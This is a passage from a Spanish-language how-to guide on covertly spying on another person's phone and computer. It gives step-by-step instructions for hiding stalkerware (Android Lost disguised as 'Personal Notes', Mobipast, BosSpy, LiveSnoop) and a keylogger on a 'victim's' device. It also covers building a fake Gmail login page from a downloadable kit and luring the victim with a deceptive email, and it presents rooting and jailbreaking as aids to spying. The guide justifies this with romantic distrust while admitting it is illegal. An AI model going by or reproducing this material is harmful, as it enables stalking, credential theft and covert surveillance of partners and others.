preguntarse qué es eso. Es ahí donde debemos usar ingeniería
social solo en caso de que la víctima sospeche que su cuenta de
Gmail ha sido hackeada. Es muy probable de que la víctima
sencillamente la abra y no encuentre nada interesante en ella, y
termine dejándola quieta sin saber qué es.

El ícono de la aplicación pasa


brevemente desapercibida, ya que lo que expresa es
sencillamente “Personal Notes” con un ícono de papel y lápiz,
como si fuera sencillamente una aplicación aburrida y poco
llamativa para guardar notas. Lo cual pude confundir tanto al
ladrón que roba el celular, como a nuestra querida víctima de
espionaje.

Paso 2: Aquí es donde debemos invitar a la acción. De alguna


manera, utilizando algún tipo de estrategia buena que se nos
pueda ocurrir, debemos hacer que la víctima sencillamente pulse
el botón llamado “Request Administrator rights” o (Pedir
derechos de administrador). Una vez pulsado el botón, lo que
sigue es hacer que la víctima pulse el botón activar que
aparecerá después de pulsar este. En ese momento, si logras que
la víctima lo haga o tú lo hagas en caso de que tengas el teléfono
en mano, tendrás total control sobre el celular de víctima, podrás
hacer todas las funciones antes mencionadas.

Page | 48
Paso 3: Ya instalada y activada la aplicación, vamos a la página oficial “AndroidLost.com” en la cual
abriremos una cuenta con el mismo Gmail de la víctima. Solo debemos pulsar el botón “Registrar”
que está situado en la esquina superior derecha de la pantalla.

Paso 4: Ya ingresada la cuenta de Gmail, podemos acceder a los controles que nos permitirán
manejar todas las funciones que queramos manejar, como las ya mencionadas anteriormente. Las
imágenes a continuación mostrarán solo una parte de todo lo que puedes hacer en cada una de las
secciones.

l
Page | 49
Page | 50
Page | 51
Page | 52
Desinstalación:

Para la desinstalación de la aplicación, deberemos tener el


teléfono a mano para ir a las configuraciones. Vamos a la parte
de Seguridad “Security”.

Estando en “Security”, vamos a la parte llamada “Device


administrators” (Administradores de dispositivos).

Allí encontraremos las aplicaciones que tiene autoridad sobre


el sistema Android, entre ellas, obviamente, la ya instalada
Android Lost que se oculta bajo el nombre “Personal Notes”.
Pulsamos la casilla para anularla, de esa manera ya podemos
desinstalarla como si fuera una aplicación como cualquier otra.

Page | 53
Vamos a la sección de aplicaciones descargadas donde
veremos la aplicación Personal Notes…

La desinstalamos pulsando Uninstall.

Page | 54
 Cell Tracker:
Cell Tracker te permite realizar un seguimiento de los lugares a donde quiera que esté visitando, su
propio celular o el de la víctima.
Solo pones intervalos de tiempo para registrar la ubicación y guardarlo en la base de datos, y
puesta en el rastreador celular. Al final del día se puede comprobar cuáles lugares fueron visitados
con ubicaciones guardadas en google maps. Descárgala de Google Play.

 Características fundamentales

Cell Tracker le permite ver su ubicación con fecha e historial.


Cell Tracker es una interfaz de usuario sencilla y gráfica que actúa como dice.
Cell Tracker es completamente gratis para descargar.

Requisitos
Teléfono Android Compatible

Interfaces

Lista de ubicaciones

Rastreo con Google Maps

Page | 55
Trazos de las ubicaciones recorridas

Page | 56
Métodos de Espionaje para iPhone
Si tenemos un iPhone, deberíamos saber que existen programas que desbloquean el Sistema
operativo del teléfono, habilitándolo para reconocer aplicaciones no le pertenecen, o más bien,
que no fueron diseñadas para que fuera compatible con él. Es por esto que cuando se trata de
aplicaciones de espionaje, es de suma importancia conocer el “Jailbreaking” y en qué consiste, ya
que es lo permitirá la instalación de la mayoría de aplicaciones; si ya lo sabe, puede continuar; si
no, es recomendable que se dirija al Apéndice Software y Términos para conocerlo a detalle.
Procedemos a ejecutar el “Jailbreak”.

 Tutorial TaiG Jailbreak para iOS 8:

Este es uno de los softwares gratuitos disponibles para hacer Jailbreak a nuestro Iphone.
Página oficial de descarga: http://www.taig.com/en/
Dispositivos compatibles: iPhone 4S- 6plus; iPad / iPad Aire / 2; iPad Mini / mini2 / MINI3; iPod
touch 5. Para los usuarios de iOS8.1.3, por favor utilice la herramienta de actualización de firmware
Taig para primero actualizar tu sistema a iOS8.2 Beta1, 2 y utilizar Taig Jailbreak.

Paso 1: Confirmar que la versión iOS del dispositivo sea 8-8.1.2 o 8.2 beta. Verifique la versión a
través de:
Settings > General > About > Version
Si por casualidad el proceso de Jailbreak falla descargue la última versión del Firmware y flasheala. Luego vuelve a
intentar el Jailbreak.

Paso 2: Hacer una copia de seguridad


Por favor, usa iTunes para hacer una copia de seguridad de tus datos en caso de pérdida
innecesaria.

Paso 3: Desactivar bloqueos de contraseña


Antes de hacer Jailbreak, por favor asegúrate de desactivar toda contraseña que hayas puesto en el
teléfono, también fundamentalmente desactiva la función "Find My iPhone". O el Jailbreak fallará.

1. Apaga el código de acceso a través de: Settings (Configuraciones) – Passcode (Código de


acceso) - Turn Passcode Off (Apagar código de acceso)
2. Apague "Find my iPhone" a través de: Settings (Configuraciones) - iCloud - Find my iPhone -
Haga clic para desactivar.

Paso 4: Descarga y abre la Taig Jailbreak Tool para iOS8, haga clic en el botón "Start", y el programa
se ejecutará de forma automática, no necesita otra operación. Durante el Jailbreak, por favor,
mantenga la conexión al dispositivo estable y espere pacientemente.

Page | 57
Después del Jailbreak, el dispositivo se reiniciará automáticamente. A continuación, puede ver el
resultado.

Abra su dispositivo, Cydia se muestra en la pantalla, y jailbreak untether está acabado. Ahora
puedes disfrutar libremente con su iPhone desbloqueado.

Page | 58
 Jailbreak para otras versiones iOS

Existen otros softwares gratuitos de ayuda para hacer Jailbreak en los demás sistemas iOS más
antiguos, he aquí una lista para que te guíes a conseguirlos si los necesitas:

iOS 5… Software: Redsn0w


iOS 6… Software: Evasi0n
iOS 7… Software: Evasi0n

 Guía para todas las versiones iOS

Existe una guía para hacer Jailbreak paso por paso para cualquier iPhone, echa un vistazo al link.
http://ijailbreakguide.com/

Page | 59
 Ejecutando Android en iPhone:

Todo lo que necesitas para empezar es un dispositivo iOS; En este momento, el iPhone 3G tiene el
mejor apoyo, y eso es lo que estamos utilizando en esta guía.

Paso 1: Ejecutamos el Jailbreak en Iphone.


Tienes varias opciones, incluyendo jailbreaking Pwnage Tool, Redsn0w y Blackra1n. Elige la que
trabaje en tu plataforma, descárgala, y sigue del proceso de jailbreak.

Paso 2: Instalar Bootlace en Cydia


Para ello, tendrás que lanzar Cydia desde la pantalla de inicio, pulse sobre el botón “Manage”,
seleccione “Source”, a continuación, pulse “Edit” y luego “Add”. El repositorio que tendrás que
añadir es repo.neonkoala.co.uk. Tocamos “Add Source”, deje a Cydia hacer su magia, y luego toque
en su repositorio recién agregado e instale “Bootlace”.

Paso 3: Ejecutar Bootlace y el parche Kernet


Deja Cydia, y lanza Bootlace. Si Bootlace no está en la pantalla de inicio después de salir de Cydia,
reinicie el iPhone y debería aparecer. Entonces sólo lanzamos Bootlace, y se deja descargar y
parchear el kernel. Cuando haya acabado, pulse Reiniciar y espere a que el teléfono se reinicie.

Page | 60
Paso 4: Ahora lance el Bootlace de nuevo. Pulse el botón Openiboot y pulse “Install”, entonces
“Continue”. Opniboot se descargará e instalará.

Paso 5: Instalar iDroid


Una vez OpeniBoot está instalado, pulse sobre el botón iDroid, toque Instalar, OK, y luego esperar.
iDroid-que es esencialmente el sistema operativo Android personalizado para su iPhone- se
descargará e instalará. Esto tomará un tiempo, así que tenga paciencia, y si la batería se debilita, es
posible que desees conectar tu teléfono antes de empezar.

Paso 6: Reiniciar y jugar con el Android


Ahora que has instalado Android en tu iPhone. Hora de jugar un rato con él. Sólo tienes que pulsar
en el botón QuickBoot desde el interior de Bootlace, pulse el icono de Android (el del pequeño
Android que sostiene la manzana con orgullo), y confirme que desea reiniciar en Android.

¿Cómo funciona?
Lo primero a destacar es que Android en el iPhone no está tan cerca o listo para usarse como su
sistema operativo original de tiempo completo. Eso no quiere decir que nunca será, pero por el
momento, esto es algo más que te gustaría hacer para cumplir con tu curiosidad, y probar unas
cuantas aplicaciones android útiles.

Page | 61
El iPhone 3G es el mejor dispositivo iOS compatible (y de momento sólo él y el 2G trabajan con el
método anterior, creo). El mayor problema en este momento con el 3G es la administración de
energía (PMU en el wiki), que no es completamente funcional. Lo más importante, la suspensión de
la batería aún no está disponible, por lo que su batería puede no durar mucho.

Page | 62
 Mobipast:

Tutorial paso a paso de una de las mejores aplicaciones gratis de


espionaje para Smartphone. Debe instalarse en controlador en tu
celular, y el software espía en el celular de la víctima. A continuación los
pasos.

Requisitos
Smartphone iPhone/Android
Conexión internet constante

Características

• Rastreo de ubicación por GPS


• Historial de Internet
• Captura de código de seguridad de los bloqueos
• Registro de lista de contactos

 Descarga de la aplicación iPhone

Paso 1: Abra la aplicación Cydia

Page | 63
Paso 2: Seleccione “Manage”

Paso 3: Selecciones “Sources”.

Paso 4: Pulse el botón “Edit”

Page | 64
Paso 5: Pulse el botón “Add”.

Paso 6: Introducimos el link 123.mobilpast.com y luego


pulsamos “Add Source”

Paso 7: Esperemos un momento y luego pulsamos el botón


que aparecerá, “Return to Cydia”.

Page | 65
Paso 8: Seleccione la línea 123.mobipast.com

Paso 9: Seleccione la aplicación MobiPast

Paso 10: Pulse el botón “Install”

Page | 66
Paso 11: Pulse el botón “Confirm”

Paso 12: Espere unos segundos y pulse el botón “Restart


SpringBoard”

Ya está instalada la aplicación, pudes ver su ícono.

Page | 67
Paso 13: Abrimos la aplicación y vamos a nuestra
cuenta.

Paso 14: Pulse el botón “Log In” para ingresar

Paso 15: Ingrese una dirección de correo electrónico


verdadera y contraseña de Gmail o Yahoo (le
recomendamos que cree una dirección de correo
electrónico Gmail o Yahoo sólo para recibir datos de
MobiPast) y pulse el botón “Ok”

Page | 68
 Descarga del Software de espionaje iPhone

Para descargar el software de monitoreo solo debe seguir los pasos anteriores del Paso 1 al Paso 9,
que es cuando elegimos el archivo de instalación:

Con la excepción de que elegiremos el software de


monitoreo…

Seguimos los demás pasos como anteriormente hasta


que llegamos a esta pantalla, que es justo cuando
reiniciamos el dispositivo después de haber instalado.
Nos vamos a buscar iPhone e introducimos el código
secreto que es “123456” y pulsamos “Buscar”.

Page | 69
Pulsamos el botón “Sign In”

Ingresamos el mismo correo electrónico que


anteriormente para iniciar sesión. Tiene que ser
verdadero.

Pulsamos Quit y dejamos que la aplicación comience a


hacer su trabajo automáticamente, comenzarás a recibir tu
primer informe dentro de 30 minutos.

Page | 70
 BosSpy:

Bosspy, es el primer software espía para Iphone 100% gratuito.

Es un keylogger freeware para iphone, ipad, ipod, teléfono y tablette Android.

 Características fundamentales

El keylogger incluye las opciones:

o Seguimiento de la ubicación de las personas que desea espiar o Leer el contenido


de los mensajes y descubrir la verdad o Obtener una copia del historial de llamadas
o Keylogger para iPhone, iPad, iPod Touch, Android (captura cualquier contraseña).

Después de eso, podrás recibir directamente por correo electrónico a cada hora el informe
keylogger, contiene todos los mensajes de chat WhatsApp, yahoo, y Skype.
Puedes capturar cualquier contraseña, de facebook, correo yahoo, gmail, hotmail, etc ...

 Guía de Instalación

Sigue estos procedimientos para instalar el software en el dispositivo determinado.

Paso 1: Inicie la aplicación Cydia.

Paso 2: Pulsamos el botón “Manage”

Page | 71
Paso 3: Selecciona “Sources” (Si no ves esa pantalla ve
directamente al siguiente paso).

Paso 4: Presione el botón “Edit”

Paso 5: Presione el botón “Add”.

Page | 72
Paso 6: Introduzca el link 1mole.bosspy.com y pulse sobre el botón
“Add Source.”

Paso 7: Espera unos minutos y luego pulsa en el botón “Return to


Cydia.”

Paso 8: Selecciona la línea 1mole.bosspy.com

Page | 73
Paso 9: Ahora pulse la entrada Smartphone.

Paso 10: Pulse el botón “Install”

Paso 11: Presione el botón “Confirm”

Page | 74
Paso 12: Espere unos segundos. Pulse el botón OK para permitir
1mole localizar el teléfono, entonces toque en el botón de reinicio
del dispositivo.

Paso 13: En cualquier momento puedes visualizar el menú para


acceder a tu cuenta Bosspy. Ir a la pantalla de búsqueda y escriba
123456, pulsa el botón “Search”.

Paso 14: La interfaz aparecerá (si la interfaz no aparece, por favor


reinicie de nuevo el dispositivo). Para acceder a tu cuenta Bosspy,
toca en el botón “Sign In”.

Page | 75
Paso 15: Introduzca la dirección de correo electrónico y contraseña
de su cuenta Bosspy, pulse el botón OK.

Paso 16: Tienes las opciones para ocultar Cydia o desinstalar 1mole
si no necesitas supervisar más.

Page | 76
Métodos de espionaje para PC
Ahora vamos a tratar lo que es el espionaje de celular a PC y de PC a PC.

 Livesnoop:

LiveSnoop es un servicio de vigilancia diseñado para el monitoreo de infantes basado en


almacenamiento en internet.
¿Si estás preocupado(a) por lo que tu hijo está haciendo en Internet? LiveSnoop es una excelente
opción. Proporcionan un servicio de monitoreo que permite a los padres para ver información
detallada acerca de todo lo que sus hijos hacen en línea. Mejor aún, los padres pueden recibir
alertas instantáneas sobre la base de la actividad de sus hijos.
Las características básicas de este servicio son absolutamente gratis y empezar sólo toma unos
pocos minutos!

 Características fundamentales

Monitoreo en Tiempo Real


Revise el uso de Internet de su hijo desde cualquier dispositivo, como sucede y cuando sucede.
Recibe alertas instantáneas cuando se detecta actividad peligrosa.

Interfaz de Usuario Moderna


Interfaz intuitiva basada en Web que muestra eventos fáciles de entender en la línea de tiempo.
Diseño de respuesta permite el acceso desde prácticamente cualquier dispositivo con un
navegador web.

Actualizaciones sin problemas


Una vez instalado el cliente LiveSnoop, se actualiza automáticamente a la versión más reciente. Las
actualizaciones se incluyen sin costo adicional.

Page | 77
 Tutorial Livesnoop

Creamos una cuenta en la página oficial pulsando el botón “Create Account”:


https://livesnoop.com/

Si ya tenemos una cuenta, pulsamos “Get Started” en la página de inicio y ponemos nuestro correo
electrónico en sección Sing In, pulsamos el botón para ingresar.

Page | 78
Una vez iniciamos sesión en nuestra cuenta ya creada, vemos estas opciones en la siguiente
imagen.
Premium: Compara las características gratuitas con las Premium
Device Info: Ver la información de los dispositivos monitoreados
Install: Para instalar el software en un dispositivo
Help: Obtenga ayuda
Activity: Vea la actividad de los dispositivos registrados
Device Settings: Cambiar configuraciones de tus dispositivos Remove
Device: Remover Livesnoop de un dispositivo.
Sign Out: Salir
Alerts: Ver las alertas generadas por tus dispositivos
Account Settings: Cambiar configuraciones relacionadas con la cuenta
Support: Contacte el servicio técnico Livesnoop

Nos dirigimos a la parte “Install” para instalar el software de espionaje en la computadora víctima.
Ahí veremos las instrucciones. Elegimos para Windows ya que para Android todavía no está
disponible.

Page | 79
A continuación aparecerán dos opciones, que son “Instalar en este dispositivo” e “Instalar en otro
dispositivo”.

En ambos casos aparecerán las instrucciones de cómo hacerlo. Cuando instalamos en otro
dispositivo, solo debemos descargar el software pulsando el botón “Download Client”, luego
tomamos la descarga y la llevamos al dispositivo víctima, ya sea por correo o en una memoria en
instalamos. La instalación no se notará ya que es totalmente invisible, así que no te preocupes si no
la ves. Inmediatamente la PC pedirá un reinicio, lo aceptamos.

Page | 80
Cuando vamos a la parte de Activity vemos los registros de las actividades de los dispositivos
monitoreados. A la izquierda vemos la lista de dispositivos agregados, en esta imagen contamos
solo con uno, llamado Cristología-PC.

Y de esta manera hemos tomado el control de esa PC, así de sencillo.

Page | 81
 Revealer Keylogger Free 2.0:

Revealer Keylogger es un potente algoritmo que puede grabar todo lo que se escribe en el teclado,
incluyendo contraseñas, independientemente de la aplicación utilizada (Skype, Facebook, MSN,
AOL, ICQ, AIM, GTalk, etc.).
Este software, en el caso de espiar celulares, podría utilizarse como poderosa estrategia para
capturar la cuenta Gmail de cualquier persona a la cual tengas acceso a su computadora. Basta con
instalar el software y ocultarlo, que de por sí es difícil de detectar.

Requisitos
Una PC de cualquier tipo de sistema operativo
Acceso a ella (ya sea por algún descuido de la víctima, o que conozcas la contraseña para acceder)

Dónde descargarlo http://www.logixoft.com/

Paso 1: Vamos a la página principal, pulsamos el botón de descarga “Free Download”.

Page | 82
Nos redirigirá a una página externa llamada “download.cnet.com”, no hay problema, es normal. Es
ahí donde la descarga se iniciará automáticamente.

Paso 2: Una vez la descarga esté completada, buscamos el archivo en la carpeta de descarga. Lo
ejecutamos. Nota: Puede ser que el antivirus lo detecte como archivo malicioso, es normal, ya que
este software de por sí es malicioso, está diseñado para robar toda información que sea digitada
por el teclado; pero esa es la idea, para poder obtener la cuenta de Gmail de la víctima. Nos
aparecerá una ventana como esta en la cual tenemos dos opciones, Instalar ahora, que es la
primera, o Personalizar. Si queremos que el software quede totalmente oculto, vamos a instalar
ahora; aunque no te lo recomiendo totalmente pues queda tan bien ocultado que se dificulta
encontrarlo. Lo mejor es la opción “Customize”; ya que así podemos elegir ponerla en el escritorio
a modo de prueba y luego
moverla y esconderla
donde queramos.

Page | 83
Paso 3: Para abrir la aplicación, sencillamente pulsamos las teclas Ctrl + Alt + F9 para abrirla como
un atajo. También podemos dar doble click en el ícono de la aplicación que aparece en escritorio.
Vamos a pulsar el botón que está en la esquina superior izquierda de la pantalla, llamado “Start”,
con el cual daremos inicio al espionaje. Al cabo de un minuto, el programa estará registrando
información de todo lo que se digite con el teclado. Como puedes ver en la siguiente imagen, al
lado derecho se muestran los registros de todo lo que se ha digitado, tanto en el buscador Google,
como en documentos Word, también en el traductor de Google.

Paso 4: Procedemos a ocultar el programa en alguna parte extraña del computador, que
difícilmente la víctima revise. Entonces inventamos algún tipo de estrategia o excusa para que la
víctima termine ingresando a su cuenta de Gmail. En algún momento de descuido, podemos
acceder al computador y abrir el programa, quien nos estará diciendo todo lo sucedido. Entre la
información recaudada, buscaremos la que se relacione con la cuenta de Gmail, capturamos y
guardamos la contraseña, con la cual accederemos y completaremos el espionaje a su celular.

Page | 84
Métodos de Phishing (Hack de correos y
contraseñas)
El término Phishing puede aplicarse a una buena variedad de métodos utilizados para obtener de
manera fraudulenta información personal confidencial, como correos, contraseñas e
información bancaria, entre otras cosas. Ahora bien, volvemos a dejar claro algo. Lo que vas a
aprender aquí, es solo con el propósito de obtener el Gmail de la víctima con el propósito de
instalarle una aplicación espía remotamente, y de esta manera tomar control de los datos del
teléfono. Esto solo se debe emplear por motivos de protección y recaudación de información
por motivos de ansiedad y desconfianza amorosa. Sin embargo, aunque sea por ese motivo,
la práctica sigue siendo ilegal. Por lo cual cada quien es responsable de lo que haga con esta
información, presentada acá por motivos educacionales.

 Tutorial

¿En qué consiste el Phishing en esta ocasión?


Consiste en utilizar una página falsa (que será nuestro dominio), que sea idéntica a la página
original de acceso a Gmail. De esta manera confundiremos a nuestra víctima, la cual
probablemente ingrese sus datos creyendo que está accediendo a la página principal Gmail, pero
en realidad está ingresando sus datos en nuestro dominio, por lo cual su correo y contraseña será
nuestro. Debemos asegurarnos de que la víctima ingresa la cuenta de Gmail vinculada a su teléfono
Android, de esta manera podremos instalar las aplicaciones espías desde la página de Google Play
remotamente.

¿Cómo lo haremos?
Simplemente siga los pasos a continuación y le aseguramos que su Phishing estará listo 100%
exitosamente.

Page | 85
Paso 1: Crear un dominio, ya sea gratis o pago. Es bastante fácil. Solo debes dirigirte a páginas
donde brinden este servicio gratuito y registrarte, así de sencillo. En caso de que se te esté
dificultando hacerlo en una de estas páginas, puedes probar otras páginas que de igual manera
funcionarán y ver tutoriales en YouTube de cómo crear un dominio, hay muchos tutoriales de eso.

Page | 86
Paso 2: Una vez creado el dominio, descargamos el cliente FileZilla, que es un programa que nos
permitirá transferir directamente nuestros archivos de configuraciones a nuestro dominio.
http://filezilla.uptodown.com/

Paso 3: Instalamos el programa. En caso de que no sepa véase un tutorial en YouTube.

Paso 4: Vinculamos nuestro dominio con el FileZilla. Para vincularlo, debemos ingresar los datos del
dominio en el FileZilla. Todos los datos de tu servidor se te otorgarán en el momento en que te
registres, no que de qué preocuparse. Esos datos son: el usuario, la contraseña, y la dirección del
dominio en sí. Como vemos en la siguiente imagen, las casillas que deberemos llenar aparecerán
en la parte de arriba de la interfaz del FileZilla.
Donde dice “Servidor” pondremos la dirección de nuestro servidor como está en este ejemplo.
“Nombre de Usuario” nuestro nombre de usuario. Y luego la casilla contraseña. El puerto lo
podemos dejar vacío. Pulsamos “conexión rápida” para ingresar a nuestro servidor.

Page | 87
Paso 5: Colocamos los archivos que están en la carpeta especial que te entregaremos. Como
puedes ver a continuación, el FileZilla viene con su interfaz vacía. La carpeta en donde subiremos
los archivos es en la llamada “Public HTML”, en la parte que está debajo. Sencillamente
arrastramos los archivos ahí. (Los archivos de estos links están comprimidos, en caso de que no
sepas cómo descomprimirlos, echa un vistazo al Apéndice Winrar al final de esta guía).
Descarga la carpeta que contiene los archivos aquí:
http://www.mediafire.com/download/kwxq1qww5etkdl4/Gmail+Script.rar
https://mega.co.nz/#!exonSIRI!Xn3ZhFWkxU7HM-3743enn4NPTkNxRa3QPXk5mNMuoxM

Page | 88
Paso 6: Arrastramos los archivos al FileZilla, a la carpeta Public HTML.

Tu FileZilla ahora se verá de esta manera:

Page | 89
Paso 7: Copiamos la dirección de nuestro dominio y la pegamos en nuestro buscador, ahí veremos
que nuestra página tiene el diseño de Gmail.

Paso 8: Ahora lo que debemos hacer es utilizar algún tipo de estrategia para hacer que la víctima
ingrese a su cuenta de Gmail. Cuando acceda, los datos que ingrese serán nuestros y nos
aparecerán en un archivo de texto entre los archivos del FileZilla. Específicamente en el archivo
llamado datos_sv como puedes ver en la imagen. Lo abrimos, y ahí tenemos el usuario y la
contraseña para acceder.

Entre las estrategias que podemos utilizar, podemos mencionar que una muy efectiva es enviar un
correo con aspecto y escritura muy profesional avisando de que hay riesgos de perder la cuenta de
Gmail, que debe acceder a su cuenta de inmediato para evitar que sea cancelada; o te puedes
inventar cualquier otra estrategia que sea igual o más convincente que esta. Entonces enviamos el
link junto con el correo para que ingrese sus datos ahí, en nuestro dominio falso. Si cae, entonces
la operación fue un éxito y podrás instalarle aplicaciones mientras duerme, sin importar en cuál
país del mundo esté. (Véase la parte Espiar Celulares a Distancia para saber cómo instalar
aplicaciones remotamente).

Page | 90
Software Anti-Spyware
¿Y si somos nosotros que estamos siendo espiados? Es una muy buena pregunta, ya que en este
libro has aprendido cómo espiar, entonces es relevante preguntar en sentido inverso, ya que sí
existe la posibilidad de que estemos siendo espiados.
Existen aplicaciones para defendernos.

 Anti Spy Mobile Free:

Es un escáner Gratuito de software de espía que detecta y elimina las


aplicaciones de espía en su Teléfono móvil Android. ¡La aplicación de
protección de software de espía es obligatoria para cada equipo!
AntiSpy Mobile utiliza técnicas perfeccionadas de detección, CAPACES
de identificar INCLUSO software nuevo de espionaje.
Solo instalamos desde Google Play y listo, ya tenemos nuestra
aplicación.

Así se ve su interfaz, se pueden ver los Spywares,


Advertencias y las demás aplicaciones.

Page | 91
Rooteo de Android (Acceso Root)
Esta es la parte en la cual vamos a rootear el móvil de nuestra víctima o el nuestro. El punto de
importancia de esta operación, es saber que cuando Rooteamos, estamos liberando al teléfono de
las restricciones impuestas por el fabricante, por razones de seguridad. Esto nos permitirá espiar
los mensajes de Whatsapp usando la herramienta “DroidJack” situada en la página 29 de esta guía.
La aplicación que vamos a usar para rootear nuestro móvil es “King root”, la cual permite rootear
cualquier móvil en simples pasos pocos minutos. Nunca había existido una manera más fácil de
rootear un móvil que esta!

Descargar King Root: https://mega.nz/#!jkIU0brT!7GF2do7tcV3g5T9dfyB9y9taOQfNZIu6fhPgbWdPI4

 Tutorial King Root:

Este tutorial te mostrará paso por paso cómo hacerlo en cualquier Android. Este tutorial comienza
a explicar justo después de haber descargado el archivo, ya sea directamente o que haya sido
pasado de PC a celular modo USB.

Paso 1: Vamos a la carpeta donde hemos puesto el archivo


apk de Kingroot que descargamos en el enlace anterior y
lo ejecutamos.

Page | 92
Paso 2: Completamos la instalación con cualquier instalador.
(Recuerde que debe tener la opción “Instalar de Fuentes
desconocidas” activada, esa opción se encuentra en las
configuraciones de seguridad de todos los Android)

Paso 3: Pulsamos instalar para comenzar la instalación.

Paso 4: Abrimos la aplicación y nos aparecerá una ventana como


esta.

Page | 93
Paso 5: Esta pantalla inicial y de otro modelo de pantalla, es lo
que aparece al momento de abrir la aplicación, cuando ya hemos
leído la introducción que aparece en la imagen anterior de este
artículo. Pulsamos el botón “Try to root.”

Paso 6: Esperamos a que termine de Rootear, el cual será un


proceso mostrado con medidas de porcentaje como se puede
ver en la imagen.

El Purify es una función que viene junto a esta aplicación la


cual permite limpiar el móvil de consumo de memoria Ram
innecesario. Evitando que aplicaciones que no se están
usando el momento salga a flote consumiendo la capacidad
del móvil. Esto es opcional, si purificas o no el móvil, de todas
formas podremos espiar.

Page | 94
Pulsamos el botón “Done” para finalizar.

He aquí el menú normal de la aplicación, solo tenemos que


cerrarla y salir de ella.

Tenemos en el escritorio 2 aplicaciones, cada vez que


queramos purificar usamos Purify, la otra es sencillamente la
instalación.

Page | 95
Paso 7: Buscamos en Google Play el Root Checker, el cual nos
permitirá verificar si realmente somos Root. Esto es solo un
escáner. La instalamos.

Paso 8: Abrimos la aplicación una vez instalada y pulsamos el


botón “Verify Root”.

Como podemos ver, el dispositivo ha sido confirmado como


Root. Ahora en este móvil somos libres espiar Whatsapp
cuantas veces queramos, entre otras funciones que conocerá
en la página 29 de esta guía.

Page | 96
Apéndice: Software y Términos

 SpywareBlaster:

SpywareBlaster es una utilidad para PC y Laptops especialmente diseñada para evitar que le espíen,
que vacuna los navegadores frente a programas maliciosos. Más en concreto, SpywareBlaster
añade cookies y controles ActiveX a las listas negras de Internet Explorer y Firefox, y restringe el
acceso a páginas peligrosas.

SpywareBlaster dispone también de herramientas tan útiles como un creador de instantáneas de


sistema -imprescindible para deshacer cambios- y un gestor de copias de seguridad del fichero
hosts, que contiene la configuración de red de Windows. Incluso hay un eliminador de Flash.

Requisitos
Los requisitos son muy mínimos, casi cualquier computadora lo puede ejecutar exitosamente. Es
compatible con la mayoría de versiones de sistemas operativos también. Liviano y fácil de usar.

¿Dónde conseguirlo?
Se consigue casi en cualquier parte de internet, ya que es totalmente gratis. Es recomendable
descargarlo de páginas reconocidas para evitar posibles inconvenientes con infecciones virales
entre otros. En mi caso, lo descargué de la página Softonic.com. Puede ver en las siguientes
imágenes, paso por paso cómo fue el procedimiento.
Paso 1: Como ve en la primera imagen, basta con pulsar el botón “Descargar Gratis”.

Page | 97
Paso 2: Luego de haber descargado, vamos a la carpeta de descarga, donde encontraremos el
instalador con su respectivo nombre, “SpywareBlaster”. Hacemos doble click para comenzar la
instalación.

Paso 3: La instalación se verá de esta manera, como usualmente se instala un programa común.

Page | 98
Paso 4: Procedemos a aceptar los términos y condiciones para poder continuar.

Paso 5: Luego elegimos en parte de nuestra PC se alojará. Pulsando el botón “Browse” o


“Examinar” podemos elegir la carpeta donde queremos que se instale. Es recomendable dejarla en
la carpeta que está por defecto. Pulsamos “Next” para continuar.

Page | 99
Terminando instalación…

Paso 6: Luego se te da la bienvenida al programa, donde te explican en qué consiste cada


característica fundamental. Pulsamos “Next”.

Page | 100
Paso 7: Luego nos aparece una pantalla donde podemos elegir la opción de actualización que
queramos. La que dice “Automatic Updating” es para actualización automática del programa. La
que dice “Manual Updating” es para actualizar el programa nosotros mismos cuando queramos.

Paso 8: Una vez terminado, pulsamos “Finish” para finalizar la bienvenida.

Page | 101
Paso 9: Luego aparecerá un Popup por sí mismo, se abrirá una pestaña Web. En esa pestaña
encontramos más información acerca de cómo funciona y cuáles son las diferencias entre la
versión gratuita y la comprada.

Paso 10: En la parte inicial del software pulsamos la opción que aparece en la parte baja, llamada
“Enabling All Protection”, para activar la protección total del sistema. De ahora en adelante sus
seguridad anti espionaje habrá incrementado.

Page | 102
Apéndice: Software y Términos
Conozca la definición de cada cosa que decimos que usted no entienda a plenitud. Esta es la parte
informativa de algunos detalles muy importantes, busque lo que necesite saber.

 Cydia:

Es una aplicación de software para iOS que permite a un usuario encontrar


e instalar los paquetes de software en los dispositivos iOS de Apple
jailbreak como el iPhone, el iPod Touch y el iPad. También hace referencia
a la plataforma de distribución digital de software en iOS que accede a
través del software Cydia. La mayoría de los paquetes de software
disponibles a través de Cydia son gratuitos, pero algunos requieren de
compra.
Cydia es desarrollado por Jay Freeman (también llamado "saurik") y su compañía, SaurikIT. El
nombre "Cydia" es una alusión al gusano de la manzana, con un nombre científico de Cydia
pomonella, que es el gusano proverbial "en la manzana."

Propósito y Funcionamiento
Cydia proporciona una interfaz gráfica de usuario para los usuarios con jailbreak utilizando
repositorios Advanced Packaging Tool (APT) para instalar el software disponible en la App Store.
Aunque algunos pueden encontrar esto útil, pero también puede poner en peligro a los usuarios
del dispositivo. Dado que los usuarios tienen que hacer jailbreak a su dispositivo para instalar Cydia
y sus paquetes, esto deja una abertura para que cualquier malware se instale en el dispositivo, por
lo general por los PDF o paquetes infectados. Cydia se basa en APT, portando a iOS como parte del
proyecto Telesphoreo de Freeman.
Los paquetes de software se descargan directamente en a un dispositivo iOS, a la misma ubicación
que las aplicaciones preinstaladas de Apple, al directorio /Applications. Dispositivos con jailbreak
también pueden todavía comprar y descargar aplicaciones normalmente desde la App Store oficial.
Algunas herramientas de jailbreak (cada una de ellas compatibles a un conjunto específico de
dispositivos y versiones de iOS) instalan Cydia de forma automática, mientras que otras ofrecen
una opción para el usuario.

Page | 103

Jailbreak (iOS):

Se denomina Jailbreak (literalmente: "fuga de la cárcel", en


español: "destraba") al proceso de suprimir algunas de las
limitaciones impuestas por Apple en dispositivos que utilicen el
sistema operativo iOSmediante el uso de kernels modificados.
Tales dispositivos incluyen el iPhone, iPod Touch, iPad y la Apple
TV de segunda generación. El jailbreak permite a los usuarios
acceder por completo al sistema operativo, permitiendo al
usuario descargar aplicaciones, extensiones y temas que no
estén disponibles a través de la App Store oficial. Un dispositivo con jailbreak todavía puede usar la
App Store, iTunes y todas las demás funciones, como hacer llamadas telefónicas. El jailbreak es una
forma de escalado de privilegios, y el término se ha usado también con otros sistemas
computacionales.
A diferencia del proceso de rootear un dispositivo Android, el jailbreak es necesario si el usuario
quiere correr software no autorizado por Apple. Un jailbreak "atado" (tethered, en inglés)
requiere que el dispositivo esté conectado a un ordenador cada vez que inicie; un jailbreak "sin
ataduras" (untethered, su equivalente en inglés) permite al dispositivo encender sin la asistencia
de un ordenador. Bajo el Digital Millennium Copyright Act, el proceso de hacer jailbreak es legal
